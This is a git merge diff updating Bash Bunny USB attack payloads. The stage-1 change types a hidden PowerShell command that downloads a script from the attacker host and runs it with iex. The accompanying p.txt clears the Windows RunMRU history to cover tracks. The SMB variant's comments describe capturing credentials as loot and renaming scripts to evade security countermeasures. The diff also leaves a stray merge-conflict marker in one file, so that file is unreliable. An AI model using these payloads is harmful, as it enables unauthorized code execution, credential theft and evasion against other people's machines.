Merge pull request #340 from hink/master

[PAYLOAD UPDATE] psh_DownloadExec Update

payloads/library/execution/psh_DownloadExec/p.txt

@@ -1,2 +1,3 @@
 New-Item $ENV:UserProfile\Desktop\SUCCESS -ItemType file
 Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
+

payloads/library/execution/psh_DownloadExec/payload.txt

@@ -45,12 +45,12 @@ cp -R ${PAYLOAD_DIR}/* /tmp/ # any additional assets will be available in tmp
 # STAGE 1 - POWERSHELL
 LED STAGE1
 
-RUN WIN "powershell -WindowStyle Hidden \"\$web=New-Object Net.WebClient;while (\$TRUE) {If ((New-Object net.sockets.tcpclient ('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');\$web.DownloadString('http://172.16.64.1/DONE');exit}}\""
+RUN WIN "powershell -WindowStyle Hidden \"\$web = New-Object Net.WebClient;While (\$true) {If ((New-Object net.sockets.tcpclient ('${HOST_IP}','80')).Connected) {iex \$web.DownloadString('http://${HOST_IP}/p.txt');exit}}\""
 # Remove tracks in the psh payload if you wish
 
 # STAGE 2 - WAIT
 LED STAGE2
-while ! grep -Fq "GET \"/DONE\"" ${SERVER_LOG}; do
+while ! grep -Fq "GET \"/p.txt\"" ${SERVER_LOG}; do
     sleep .5
 done
 

payloads/library/execution/psh_DownloadExecSMB/payload.txt

@@ -9,6 +9,11 @@
 # Firmware:      >= 1.2
 #
 # Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless!
+# Credentials captured by  are stored as loot.  
+# Ensure p.txt exists in payload directory  (using .txt instead of .ps1 in case of security countermeasures)
+#
+# Required tools: impacket 
+=======
 # Credentials captured by  are stored as loot.
 # Ensure p.txt exists in payload directory  (using .txt instead of .ps1 in case of security countermeasures)
 #